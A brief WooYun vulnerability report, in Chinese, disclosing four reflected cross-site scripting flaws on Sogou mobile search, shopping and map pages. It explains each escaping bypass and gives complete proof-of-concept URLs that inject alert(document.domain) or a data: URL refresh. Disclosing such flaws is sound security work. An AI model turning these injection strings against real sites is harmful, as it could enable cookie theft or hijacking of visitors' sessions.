WooYun.org

1.http://wap.sogou.com
http://wap.sogou.com/web/searchList.jsp
当搜索11111111"'<> 有这么一出输出：将'转义为\'

而我们提交\'

变成\\' 成功逃脱'的限制
payload:http://wap.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1278&t=1431058749585&s_t=1431058756606&keyword=\%27%3Balert%28document.domain%29%3B%3C!--&pg=webSearchList&s=

2.wap.gouwu.sogou.com
WooYun: 搜狗购物存在xss漏洞
应该是<>被过滤了，'被转义，而"却没做处理
找到一个输出点，提交11"}');alert();//
发现'被转义不能逃脱限制

结果发现到这输出了..

({oquery:""});alert(document.domain);//",desc:{attrid:0,attrtype:1,attrname:2},chosen:[],hot:[]})

payload:http://wap.gouwu.sogou.com/search#shop/query=1"});alert(document.domain);//&sourceid=sr_tbtn&ie=utf-8
3.http://map.sogou.com
WooYun: 搜狗某处XSS
官方修复是过滤<>,而不管" '
payload:
http://map.sogou.com/store/nanchong+n=0;%20url=data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%20http-equiv=%22refresh%22%20xxx=%22#hb=0,1&c=11809562.50000009,3584875,12
4.http://m.sogou.com/
http://m.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1274&t=1431060287847&s_t=1431060291268&keyword=2\%27;alert%28document.domain%29;%3C!--&pg=webSearchList

类似的漏洞肯定还有很多..慢慢排查吧~